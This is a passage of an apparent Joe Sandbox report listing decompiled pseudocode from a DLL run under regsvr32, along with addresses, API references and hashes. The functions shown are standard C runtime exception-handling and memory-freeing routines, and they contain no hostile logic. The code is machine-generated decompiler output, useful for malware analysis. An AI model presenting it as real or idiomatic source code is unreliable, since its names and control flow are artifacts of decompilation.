				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6F84C03D(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6F84D547(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6F84AD86(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6F84AD86(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6F84A645(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6F84A578(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6F84B04B(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6F84D547(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6F84AD86(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6F84AD86(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6F84AD86(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6F84AD86(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6F84A578(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6F84B04B(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6F84AB2E(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6F84AD86(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6F84BADA(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6F84AD86(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6F84AD86(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6F84AD86(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6F84AD86(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6F84BADA(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6F84D3B8(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6F84B76E( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6f85c920) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6F84AB2E(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6F84B756( &_v64);
											E6F84A50C( &_v64, 0x6f85a7ac);
											L63:
											 *(E6F84AD86(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6F84AD86(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6F84A76B(_t279, _t319, _t274);
											E6F84B9DA(_a8, _a16, _t305);
											_t235 = E6F84BB97(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6F84B951(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x6f84b0cb
0x6f84b0d2
0x6f84b0d4
0x6f84b0dd
0x6f84b0e3
0x6f84b0eb
0x6f84b0ed
0x6f84b0f0
0x6f84b0f6
0x6f84b46f
0x6f84b46f
0x6f84b474
0x6f84b476
0x6f84b478
0x6f84b47b
0x6f84b47c
0x6f84b47f
0x6f84b485
0x6f84b5a4
0x6f84b48b
0x6f84b48b
0x6f84b48c
0x6f84b48d
0x6f84b494
0x6f84b497
0x6f84b49a
0x6f84b4a0
0x6f84b4a2
0x6f84b4a7
0x6f84b4aa
0x6f84b4ac
0x6f84b4b2
0x6f84b4b4
0x6f84b4ba
0x6f84b4cf
0x6f84b4d4
0x6f84b4d7
0x6f84b4d9
0x6f84b5a0
0x00000000
0x6f84b5a1
0x6f84b4d9
0x6f84b4ba
0x6f84b4b2
0x6f84b4aa
0x6f84b4df
0x6f84b4e2
0x6f84b4e5
0x6f84b4e8
0x6f84b4eb
0x6f84b4f1
0x6f84b503
0x6f84b508
0x6f84b50b
0x6f84b50e
0x6f84b511
0x6f84b514
0x6f84b517
0x6f84b51a
0x00000000
0x00000000
0x6f84b520
0x6f84b520
0x6f84b523
0x6f84b526
0x6f84b535
0x6f84b536
0x6f84b536
0x6f84b538
0x6f84b53b
0x00000000
0x00000000
0x6f84b53d
0x6f84b540
0x00000000
0x00000000
0x6f84b54e
0x6f84b550
0x6f84b553
0x6f84b555
0x6f84b55d
0x6f84b55d
0x6f84b560
0x6f84b562
0x6f84b564
0x6f84b580
0x6f84b585
0x6f84b588
0x6f84b588
0x00000000
0x6f84b560
0x6f84b557
0x6f84b55b
0x00000000
0x00000000
0x00000000
0x6f84b58b
0x6f84b58e
0x6f84b58f
0x6f84b592
0x6f84b595
0x6f84b598
0x6f84b59b
0x6f84b59b
0x00000000
0x6f84b526
0x6f84b5a5
0x6f84b5aa
0x6f84b5ab
0x6f84b5ae
0x6f84b5b1
0x6f84b5b2
0x6f84b5b3
0x6f84b5b4
0x6f84b5b7
0x6f84b5b9
0x6f84b631
0x6f84b633
0x6f84b633
0x6f84b5bb
0x6f84b5bb
0x6f84b5be
0x6f84b5c1
0x00000000
0x6f84b5c3
0x6f84b5c3
0x6f84b5c6
0x6f84b5c9
0x6f84b5d0
0x6f84b5d0
0x6f84b5d3
0x6f84b5d5
0x6f84b5d7
0x6f84b609
0x6f84b609
0x6f84b60c
0x6f84b613
0x6f84b613
0x6f84b616
0x6f84b619
0x6f84b620
0x6f84b620
0x6f84b623
0x6f84b62a
0x6f84b62c
0x6f84b62c
0x6f84b625
0x6f84b625
0x6f84b628
0x00000000
0x00000000
0x6f84b628
0x6f84b61b
0x6f84b61b
0x6f84b61e
0x00000000
0x00000000
0x6f84b61e
0x6f84b60e
0x6f84b60e
0x6f84b611
0x00000000
0x00000000
0x6f84b611
0x6f84b62d
0x6f84b5d9
0x6f84b5d9
0x6f84b5d9
0x6f84b5dc
0x6f84b5dc
0x6f84b5de
0x6f84b5e0
0x00000000
0x00000000
0x6f84b5e2
0x6f84b5e4
0x6f84b5f8
0x6f84b5f8
0x6f84b5e6
0x6f84b5e6
0x6f84b5e9
0x6f84b5ec
0x00000000
0x6f84b5ee
0x6f84b5ee
0x6f84b5f1
0x6f84b5f4
0x6f84b5f6
0x00000000
0x00000000
0x00000000
0x00000000
0x6f84b5f6
0x6f84b5ec
0x6f84b601
0x6f84b601
0x6f84b603
0x00000000
0x6f84b605
0x6f84b605
0x6f84b605
0x00000000
0x6f84b603
0x6f84b5fc
0x6f84b5fe
0x6f84b5fe
0x00000000
0x6f84b5fe
0x6f84b5cb
0x6f84b5cb
0x6f84b5ce
0x00000000
0x00000000
0x00000000
0x00000000
0x6f84b5ce
0x6f84b5c9
0x6f84b5c1
0x6f84b634
0x6f84b638
0x6f84b638
0x6f84b105
0x6f84b105
0x6f84b10e
0x6f84b20b
0x6f84b20b
0x6f84b20e
0x00000000
0x6f84b13d
0x6f84b13d
0x6f84b142
0x00000000
0x6f84b148
0x6f84b148
0x6f84b150
0x6f84b409
0x6f84b40d
0x6f84b156
0x6f84b15b
0x6f84b15e
0x6f84b163
0x6f84b16a
0x6f84b16f
0x00000000
0x6f84b1a7
0x6f84b1af
0x6f84b213
0x6f84b213
0x6f84b216
0x6f84b219
0x6f84b21b
0x6f84b21e
0x6f84b221
0x6f84b227
0x6f84b3d8
0x6f84b3d8
0x6f84b3db
0x00000000
0x6f84b3dd
0x6f84b3dd
0x6f84b3e0
0x00000000
0x6f84b3e6
0x6f84b3e6
0x6f84b3e9
0x6f84b3ec
0x6f84b3ed
0x6f84b3ee
0x6f84b3f1
0x6f84b3f2
0x6f84b3f5
0x6f84b3f6
0x6f84b3fb
0x00000000
0x6f84b3fb
0x6f84b3e0
0x6f84b22d
0x6f84b22d
0x6f84b231
0x00000000
0x6f84b237
0x6f84b237
0x6f84b23e
0x6f84b256
0x6f84b256
0x6f84b259
0x6f84b25c
0x6f84b262
0x6f84b272
0x6f84b277
0x6f84b27a
0x6f84b27d
0x6f84b280
0x6f84b283
0x6f84b286
0x6f84b289
0x6f84b28f
0x6f84b28f
0x6f84b292
0x6f84b295
0x6f84b2a4
0x6f84b2a5
0x6f84b2a5
0x6f84b2a7
0x6f84b2aa
0x6f84b2b0
0x6f84b2b3
0x6f84b2b9
0x6f84b2bb
0x6f84b2be
0x6f84b2c1
0x6f84b2ca
0x6f84b2cd
0x6f84b2cf
0x6f84b2cf
0x6f84b2d2
0x6f84b2d5
0x6f84b2d8
0x6f84b2db
0x6f84b2de
0x6f84b2e3
0x6f84b2e4
0x6f84b2e5
0x6f84b2e6
0x6f84b2e7
0x6f84b2ea
0x6f84b2ec
0x6f84b2ee
0x00000000
0x6f84b2f0
0x6f84b2f0
0x6f84b2f0
0x6f84b2f3
0x6f84b2f6
0x6f84b2f8
0x6f84b2f9
0x6f84b2fe
0x6f84b301
0x6f84b303
0x00000000
0x00000000
0x6f84b305
0x6f84b306
0x6f84b309
0x6f84b30b
0x00000000
0x6f84b30d
0x6f84b30d
0x6f84b310
0x6f84b313
0x00000000
0x6f84b313
0x00000000
0x6f84b30b
0x6f84b327
0x6f84b32d
0x6f84b34a
0x6f84b34f
0x6f84b34f
0x6f84b352
0x6f84b352
0x00000000
0x6f84b316
0x6f84b316
0x6f84b317
0x6f84b31a
0x6f84b31d
0x6f84b320
0x6f84b320
0x00000000
0x6f84b325
0x6f84b2c1
0x6f84b2b3
0x6f84b355
0x6f84b358
0x6f84b359
0x6f84b35c
0x6f84b35f
0x6f84b362
0x6f84b365
0x6f84b365
0x6f84b36e
0x6f84b371
0x6f84b371
0x6f84b289
0x6f84b374
0x6f84b378
0x6f84b37a
0x6f84b37d
0x6f84b383
0x6f84b383
0x6f84b38b
0x6f84b390
0x6f84b3fe
0x6f84b3fe
0x6f84b403
0x6f84b407
0x00000000
0x00000000
0x00000000
0x00000000
0x6f84b392
0x6f84b392
0x6f84b396
0x6f84b3a8
0x6f84b3ab
0x6f84b3ae
0x6f84b3b0
0x6f84b3c7
0x6f84b3cb
0x6f84b3d1
0x6f84b3d2
0x6f84b3d4
0x00000000
0x6f84b3d6
0x00000000
0x6f84b3d6
0x6f84b3b2
0x6f84b3b7
0x6f84b3ba
0x6f84b3bf
0x6f84b3c2
0x00000000
0x6f84b3c2
0x6f84b398
0x6f84b39b
0x6f84b39e
0x6f84b3a0
0x00000000
0x6f84b3a2
0x6f84b3a2
0x6f84b3a6
0x00000000
0x00000000
0x00000000
0x00000000
0x6f84b3a6
0x6f84b3a0
0x6f84b396
0x6f84b240
0x6f84b240
0x6f84b247
0x00000000
0x6f84b249
0x6f84b249
0x6f84b250
0x00000000
0x00000000
0x00000000
0x00000000
0x6f84b250
0x6f84b247
0x6f84b23e
0x6f84b231
0x6f84b1b1
0x6f84b1b9
0x6f84b1bc
0x6f84b1c1
0x6f84b1c5
0x6f84b1c8
0x6f84b1ce
0x6f84b1d1
0x00000000
0x6f84b1d3
0x6f84b1d3
0x6f84b1d6
0x6f84b1d8
0x6f84b40e
0x6f84b40e
0x00000000
0x6f84b1de
0x6f84b1e6
0x6f84b1f1
0x00000000
0x00000000
0x6f84b1fa
0x6f84b1fd
0x6f84b1fe
0x6f84b201
0x6f84b203
0x00000000
0x6f84b209
0x00000000
0x6f84b209
0x00000000
0x6f84b203
0x6f84b1de
0x6f84b413
0x6f84b413
0x6f84b415
0x6f84b416
0x6f84b41d
0x6f84b420
0x6f84b42e
0x6f84b433
0x6f84b438
0x6f84b43b
0x6f84b440
0x6f84b443
0x6f84b446
0x6f84b448
0x6f84b44a
0x6f84b44a
0x6f84b44f
0x6f84b45b
0x6f84b461
0x6f84b466
0x6f84b469
0x6f84b46a
0x00000000
0x6f84b46a
0x6f84b1d1
0x6f84b1af
0x6f84b16f
0x6f84b150
0x6f84b142
0x6f84b10e

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6F84B1C8
type_info::operator==.LIBVCRUNTIME ref: 6F84B1EA
___TypeMatch.LIBVCRUNTIME ref: 6F84B2F9
IsInExceptionSpec.LIBVCRUNTIME ref: 6F84B3CB
_UnwindNestedFrames.LIBCMT ref: 6F84B44F
CallUnexpected.LIBVCRUNTIME ref: 6F84B46A

Strings

csm, xrefs: 6F84B175
csm, xrefs: 6F84B108
csm, xrefs: 6F84B221

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: bc0a44b507778ac71b275a05a9895bc8a71cb47321c9638bad6c6b193358b432
Instruction ID: 2d76626450b2f077de3d38ac73009c40dd6b060d900e6b47dcc7b50405e3e389
Opcode Fuzzy Hash: bc0a44b507778ac71b275a05a9895bc8a71cb47321c9638bad6c6b193358b432
Instruction Fuzzy Hash: AFB1367180021DEFCF19CFA9C980A9EBBB5FF05315F1049AAE8246F251D735EA51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6F84D878 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6F84D878(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x6f855f50;
				if(_t68 != 0x6f855f50) {
					E6F84DC0E(_t68);
					_t36 = _a4;
				}
				E6F84DC0E( *((intOrPtr*)(_t36 + 0x3c)));
				E6F84DC0E( *((intOrPtr*)(_a4 + 0x30)));
				E6F84DC0E( *((intOrPtr*)(_a4 + 0x34)));
				E6F84DC0E( *((intOrPtr*)(_a4 + 0x38)));
				E6F84DC0E( *((intOrPtr*)(_a4 + 0x28)));
				E6F84DC0E( *((intOrPtr*)(_a4 + 0x2c)));
				E6F84DC0E( *((intOrPtr*)(_a4 + 0x40)));
				E6F84DC0E( *((intOrPtr*)(_a4 + 0x44)));
				E6F84DC0E( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6F84D6A4(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6F84D70F(_t67, _t72, _t73, _t77);
			}

0x6f84d878
0x6f84d878
0x6f84d878
0x6f84d87d
0x6f84d883
0x6f84d885
0x6f84d88b
0x6f84d88e
0x6f84d893
0x6f84d896
0x6f84d89a
0x6f84d8a5
0x6f84d8b0
0x6f84d8bb
0x6f84d8c6
0x6f84d8d1
0x6f84d8dc
0x6f84d8e7
0x6f84d8f5
0x6f84d900
0x6f84d908
0x6f84d909
0x6f84d90c
0x6f84d912
0x6f84d916
0x6f84d91a
0x6f84d91b
0x6f84d925
0x6f84d92b
0x6f84d92c
0x6f84d92f
0x6f84d935
0x6f84d939
0x6f84d93d
0x6f84d944

APIs

_free.LIBCMT ref: 6F84D88E

Part of subcall function 6F84DC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?), ref: 6F84DC24
Part of subcall function 6F84DC0E: GetLastError.KERNEL32(?,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?,?), ref: 6F84DC36

_free.LIBCMT ref: 6F84D89A
_free.LIBCMT ref: 6F84D8A5
_free.LIBCMT ref: 6F84D8B0
_free.LIBCMT ref: 6F84D8BB
_free.LIBCMT ref: 6F84D8C6
_free.LIBCMT ref: 6F84D8D1
_free.LIBCMT ref: 6F84D8DC
_free.LIBCMT ref: 6F84D8E7
_free.LIBCMT ref: 6F84D8F5

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 392f778bb74906e963d558d04c02d9930812114c8bfa60f79a13f0a68031c45c
Instruction ID: f369a3e8dcd6d1a6416abeca6579eef55ca8d49d31ed81bf8306a948e0523a2a
Opcode Fuzzy Hash: 392f778bb74906e963d558d04c02d9930812114c8bfa60f79a13f0a68031c45c
Instruction Fuzzy Hash: 2421877694020CFFCB52DF98C840DDE7BB9AF48344B0145A6E5199F260EB71EA55CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6F84A9D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

